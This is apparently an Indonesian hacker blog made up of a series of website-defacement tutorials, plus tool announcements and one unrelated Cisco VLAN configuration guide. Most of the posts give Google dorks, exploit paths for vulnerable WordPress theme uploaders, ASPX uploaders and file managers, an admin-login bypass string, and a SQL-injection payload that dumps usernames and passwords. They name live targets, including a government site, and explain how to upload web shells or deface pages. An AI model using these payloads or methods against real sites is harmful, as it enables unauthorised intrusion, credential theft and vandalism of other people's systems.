Tutorial Deface ORANGE_THEMES !

Yoo gan :V
kembali lagi sama w :v admin gans :V
nah kali ini mimin mau share new method deface wordpess yaitu ORANGE_THEMES

Okee Langsung aja yaa :v

Dork :

inurl:"/wp-content/themes/bordeaux-theme/" 
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/" 
inurl:"/wp-content/themes/reganto-theme/" 
inurl:"/wp-content/themes/rockstar-theme/"
  
Exp :
/functions/upload-handler.php

Langsung aja gayn 

 

Tambahkan exploit sesudah /themes/nama path/

Jika Error Berarti VULN 

Note :: VULN BELUM TENTU BISA UPLOAD SHELL 

Ooke Lanjut Buka CSRF Onlain:V

udah w buat secara ONLAIN :v

http://denganlombok.online/cr.php

Oke abis itu copy Linknya 

 Abis Itu Masukin Link yg ada error tadi dalam Textbox URL Dan Masukan Tipenya orange_themes!

Setelah Itu Klik LOCK ! 

Abis itu Akan Ada Uploader Muncul 

Nah Pada Bagian Ini Terserah Kalian Mau UPLOAD SHELL / Script Deface 

mimin mau up script deface aja :v h3h3

Abis Itu ....

Akan Muncul Begini..

Jika Menampilkan Gini Berarti Shell / Script Kita Telah Terupload sempurna 

eitss ingat GAK SETIAP WEB VULN BISA DI UPLOAD SHELL

Oke langsung aja cara aksesnya 

 WWW.SITE.COM/wp-content/uploads/TAHUN DIAPLOAD/BULAN DI UPLOAD/nama script.html atau shell.php

ingat Pada bagian ini 

Setelah /Uploads itu tahun ketika kalian upload shell/ script kalian 

dan setelah Tahun yaitu bulan, sama seperti tahun kapan kalian upload 

Dan Setelah Bulan Ada nama script / shell 

nah pada bagian ini kalian harus ingat nama yg tadi setelah di CSRF 

 Terimakasih onii chan >///<

Jangan Lupa Follow :)

Kurang Jelas ? Bisa Lihat Video Ini Klik Link Disebelah KLIK DISINI

Share:

Lanjut

Deface Method ASPX Uploader v1.0

Yoooo gan :V ketemu lagi sama mimin :v
kali ini mimin bakal share nih gimana cara deface ASPX Uploader + Up Shell

Nah Langsung aja yg dibutuhkan yaitu
1. Shell Backdoor
2. Kopi ( BIAR GAK BOSEN GAYN )
3. Otak :V

Oke

Dork :

"Powered By ES.JO"
inurl:/user_site/site/

Exp :

/Admin_Site/upload/Ahmadupload.aspx

File Access SHELL : 

/Admin_Site/upload/files/[shellmu] (  .php / .asp )



Nb . Ingat Gak Semua Web ASPX ada Ahmadupload.aspx

Tq Gayn :V

Kali ini blom ada videonya gayn :V Jadi Yaaa Sabar :V

Share:

Lanjut

Deface Shopping Bypass Admin Login Page

OKee gayn kembali lagi sama mimin :v
kali ini mimin mau share nih cara deface Shopping Bypass Adlog :V

ya methodnya sama seh kyak bepas admin oke lanjut

DOrk :

inurl:/admin/insert-product.php
inurl:/admin/update-image1.php?id=1
inurl:/admin/productimages

Cari Admin Loginnya

And

masukan username and passwordnya : '=''or' [atau] admin

OKee Sekian Dari Mimin gayn >///<

Share:

Lanjut

Realease Tools Reverse IP !

Okee gayn :"v kembali lagi sama w mimin gans :V
nah kali ini mimin mau share nih ada tools baru yg mimin buat :v
okee nama toolsnya itu ResVIp gunanya untuk Melihat IP web mana yg sama dengan web yg lainnya.

Tools Ini Menggunakan API dari ViewDns.info

OKee ini dia tampilannya

Yaps Ini Dia Toolsnya Berbasis Shell Bash / CLI

Cara gunainnya ada kok di toolsnya

Cara Installnya Itu Gampang kok

Btw Bisa Di Gunain Di Termux kok


Termux
=====
$git clone https://github.com/arifarhan16/resvip
$cd resvip
$python resvip.py [nama domain]



Linux ? Pasti Udah Pada tau kan Buat installnya dari github :v hehe
yaudah mungkin itu saja dari w

untuk cara penggunaannya bisa liat video :
Btw Kalo Suara Mimin Jelek Maap :v Karena Mimin lagi sakit :v

https://www.youtube.com/watch?v=ieDeBDPPAT0


Thx Onii-chan >///<

Share:

Lanjut

Deface SQLI-LOKOMEDIA

Okeee gaynn kembali lagi sama mimin yg gans ini :V 

kali ini mimin mau ngeshare gimana cara deface SQLI-LOKOMEDIA
mudah kok gak sampe pusing :V 


okee langsung aja 

Dork : - inurl:statis-1-profil.html - inurl:statis-2-profil.html - inurl:statis-3-strukturorganisasi.html - inurl:hal-tentang-kami.html - inurl:statis-1-pengantar.html - inurl:statis-19-beasiswa.html - inurl:statis-22-kerjasama.html Exploit : 'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ Cari Admin Login Dengan Admin Finder Punya w : $git clone https://github.com/arifarhan16/adfin.git Jika Admin Login Tak Ketemu Udah Ganti Target ae :v 

Bingung cara ngexploit nya ?? sini di kasih tau :v

contoh : 

http://sitepemerintah.co.li/statis-2-profil.html 

kamu tambahin exploit nya sesudah angka jadi kaya gini :

http://sitepemerintah.co.li/statis-2'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html


BINUNG ? KLIK INI BIAR PAHAM 

Share:

Lanjut

Google Translate Terhack ?! XSS

Yoo Gaann Kembali lagi sama mimin :V
Sekarang mimin mau share cara hack google translate bug :V

XSS Method

OKee langsung aja

Buka google translatenya

Sudah Terbuka ?

klik  Document / Dokumen

Jika Sudah nanti akan tampil uploader klik uploadernya
kemudian kalian aplod script deface kalian dalam format txt


Sebelum upload script deface kalian pilih bahasa yg akan diterjemahkan menjadi bahasa inggris dulu :v

Okee setelah udah di upload klik "TERJEMAHKAN"
 and.......


Lihat apa yg terjadi ....

BOOMMM!!!!

Selamat anda telah menghack google :v

untuk lebih jelasnya silahkan lihat video :  KLIK

Share:

Lanjut

Deface Front-End Register New Method 2019

OKeee Gaaan :V
Kembali lagi sama w mimin gans :V

kali ini mimin mau share nih ada new method deface 2019 yaitu deface Methode
Front-End Register mudah kok

Okeee langsung sadja

Dork : inurl:"/index.php/frontend/login/en" site:[.com/.net/ ] Kembangin sendiri

Expolit : /index.php/frontend/login/en


okee disini mimin ada target
live target : http://www.zshop.co.uk/ 

Masukan exploit sesudah nama web

contoh : www.target.co.li/index.php/frontend/login/en 

OKeee paham yaa

kalo udah masukin exploit kita akan dibawa ke halaman pendaftaran dan halaman login

Sebelumnya kita daftar dulu okee [ asal asalan aja ]


jika sudah daftar login lah :V

udah ? okee langsung masuk kan

setelah masuk gitu kita klik bagian atas yg namanya My Profiles
udah masuk ??

okee kita seret kebawah dan ada tempat upload

okeee itu yg warna ijo kita upload [ hanya bisa .txt saja ]


setelah terupload cara aksesnya

www.namaweb.co.li/files/namafiles.txt

Share:

Lanjut

Tutorial Deface RFM Web Pemerintahan

OKeeee gaaan :V
ketemu lagi sama mimin :V kali ini mimin bakal ngeshare gimana cara deface website pemerintahan menggunakan methode RFM ( RESPONSIF FILE MANAGER )

okee langsung aja gan

Live Target : http://sikarep.pekalongankota.go.id

Dork :
>> inurl:/filemanager/ site:[com/net/go.id]
>> inurl:/assets/js/filemanager/ site:[com/net/go.id]

Cari dialog.php

Masuk Ke Live Target

http://sikarep.pekalongankota.go.id/assets/js/filemanager/filemanager/

 Klik Dialog.php
 Kalian Akan Masuk Ke Sini 

Jika Sudah Masuk Tinggal Kita Lihat Ke Pojok Atas Kiri Ada Gambar Tanda Panah Ke Atas Kita Klik 

Akan Muncul Tampilan Seperti Ini 

Klik Tombol Warna Hijau untuk memilih file yg akan kalian up

Setelah itu kalian klik start upload Jika Berhasil Maka Akan Ada Tanda Centang / Ceklis OKeee






Mungkin Itu Aja Dari Mimin Kurang Lebihnya Silahkan Belajar Sendiri Okee :)

Thx Telah Berkunjung Onii-Chan >///<

Share:

Lanjut

Tutorial Deface SCH ID menggunakan Martabak Tools

OKee ketemu lagi sama mimin :V kali ini mimin mau ngeshare tutor gimana cara deface sch id sql-injection.


Yaa sesuai dengan judul mimin bakal pakek tools punya si Cy#b3r00T yaitu tools Martabak Auto Sql-i Balitbang

OKee ini dia tampilannya gan

yaa gampang sama aja pakek sqli-dios tinggal masukin target klik inject

tunggu aja dan boom bakal tampil okeee :*





Ini Yg Mau Toolsnya

https://pastebin.com/P1LSSwqy

Thx
===========
IndoSec
BekasiSec
Sora Cyber Team
AnarchoXploit
==========

Share:

Lanjut

Cli Browser By BekasiSec Ft IndoSec

Yoo Gaan :V Bertemu Lagi Sama w Mimin Gans >///<
Kali ini mimin mau share nih Tools CLI-Browser bisa nih yg lg ngirit kuota :v



Yookk langsung aja nih buktinya

Linux / Termux / Gitbash Bisa Kok :)

Langsung Aja

$git clone https://github.com/arifarhan16/clibrowser.git

Jika Sudah di download masuk dalam foldernya

$cd clibrowser

jika sudah masuk, kita ubah permissionnya caranya

$chmod +x setup.sh

( INGET YG DI CHMOD ITU CUMA SETUP.SH ! )

jika sudah kita buka yg satunya caranya

$sh browser.sh

Abis itu enter

UNTUK CARA PENGGUNAAN SILAHKAN EXPLORASI SENDIRI ;v

#jangancopas
#hekerkokcopas
#hekerkokbutaprogram

Selamat menggunakan :)

Share:

Lanjut

Cara Membuat Vlan Pada Perangkat Cisco

OKeee gan :V Kembali Lagi Sama w admin gans :v kali ini mimin bakal kasih tau gimana cara buat VLAN di cisco Packet Tracer OKeee :v


Langsung Buka Cisco Packetnya.


Yang Kita Butuhkan :
1. Kopi ( Gak Penting Sih :V )
2. Aplikasi Cisco Packet Tracer
3. Niat ( Karena Dari Niat Kita Bisa Melakukan Sesuatu )..


OKee langsung saja.\
1. Buat Topologi seperti gambar di bawah :

1. Sambungkan Server0, PC0, PC1 ke switch dengan port fastethernet 0/2, 0/3, 0/4 dan untuk Server1, PC2, PC3 ke switch dengan port fastethernet 0/22, 0/23, 0/24. Hal tersebut supaya untuk mempermudah dalam pembagian VLAN port di langkah selanjutnya.

1. Membuat VLAN ID
   klik pada switch cisco dan pilih CLI dan ketikkan perintah di bawah
   
   
   Switch> enable
   Switch# vlan database
   Switch(vlan)# vlan 10 name Div_1
   Switch(vlan)# vlan 20 name Div_2
   Switch(vlan)# exit
   
   
   Dalam pembuatan VLAN ID dapat membuatnya dengan angka bebas antara 1-1000, dan untuk melihat apakah pembuatan ID sudah berhasil atau belum bisa di ketikkan dengan perintah
   
   
   Switch# show vlan br
   

   
   
   
   
   
   
   
   Jika tampilan seperti gambar di atas terutama yang di kotak merah berarti pembuatan VLAN ID sudah berhasil.
   
   
2. Langkah selanjutnya yaitu mengkonfigurasi tiap port fastethernet agar nanti dapat terhubung ke VLAN yang sudah dibuat. Caranya ketikkan perintah di bawah
   
   Switch> enable
   Switch# configure terminal
   Switch(config)# int fa 0/2
   Switch(config-if)# switchport access vlan 10
   Switch(config-if)# exit
   Switch(config)# int fa 0/3
   Switch(config-if)# switchport access vlan 10
   Switch(config-if)# exit
   Switch(config)# int fa 0/4
   Switch(config-if)# switchport access vlan 10
   Switch(config-if)# exit
   
   Lakukan hal yang sama jika port akan di masukkan dalam vlan 10
3. Masukkan juga pada port yang akan terhubung ke vlan 20 dengan cara berikut
   
   
   Switch> enable
   Switch# configure terminal
   Switch(config)# int fa 0/22
   Switch(config-if)# switchport access vlan 20
   Switch(config-if)# exit
   Switch(config)# int fa 0/23
   Switch(config-if)# switchport access vlan 20
   Switch(config-if)# exit
   Switch(config)# int fa 0/24
   Switch(config-if)# switchport access vlan 20
   Switch(config-if)# exit
   
   
   lihat dengan perintah show vlan, maka akan terlihat pembagian port berapa saja berdasarkan VLAN ID.
   
   
   
   
4. Kemudian untuk memberikan IP Address kita bisa setting Server dengan DHCP, agar masing-masing PC Client bisa mendapat IP dengan otomatis. Untuk caranya sudah saya jelaskan di postingan sebelumnya. DHCP dalam metode ini dilakukan untuk menanggulangi kesalahan pemberian IP, karena terdapat lebih dari satu segmen jaringan.
5. Sampai pada langkah ini antar Server dan Client yang berada pada VLAN yang sama sudah bisa terhubung, tetapi belum terhubung jika antar Server. Untuk menghubungkannya kita perlu jembatan penghubung yaitu dengan Router. Colokkan router di switch port 20. Dan masukkan perintahberikut ke Router :
   
   Router> enable
   Router# configure terminal
   Router(config)# int fa 0/0.10
   Router(config-subif)# encapsulation dot1q 10
   Router(config-subif)# ip address 192.168.1.10 255.255.255.0
   Router(config-subif)# exit
   Router(config)# exit
   Kemudian setting juga untuk ID 20 dengan perintah
   
   Router> enable
   Router# configure terminal
   Router(config)# int fa 0/0.20
   Router(config-subif)# encapsulation dot1q 20
   Router(config-subif)# ip address 172.16.10.10 255.255.255.192
   Router(config-subif)# exit
   Router(config)# int fa 0/0
   Router(config-if)# no shutdown
   Router(config-if)# exit
   Router(config)# exit
   Router# write
6. Untuk langkah terakhir yang harus di lakukan agar semua perangkat bisa terhubung yaitu membuat port switch yang terhubung Router menjadi trunk, caranya klik pada switch dan pilih CLI dan masukkan perintah di bawah:
   Switch> enable
   Switch# configure terminal
   Switch(config)# interface fa 0/20
   Switch(config-if)# switchport mode trunk
   Switch(config-if)# exit
   Setelah semua langkah di atas di lakukan cek semua perangkat menggunakan command prompt, dan seharusnya semua sudah reply atau terhubung dengan sempurna.

Untuk Lebih Jelasnya Silahkan Lihat Video [ Klik Disini ] Maaf Juga Videonya W Potong Potong Karena Laptop w gak kuat lama buat Ngerekam Vidonya

OKeee Mungkin Itu Saja Dari Aku Kak :V 

Thx Onii-Chan >//<

Share:

Lanjut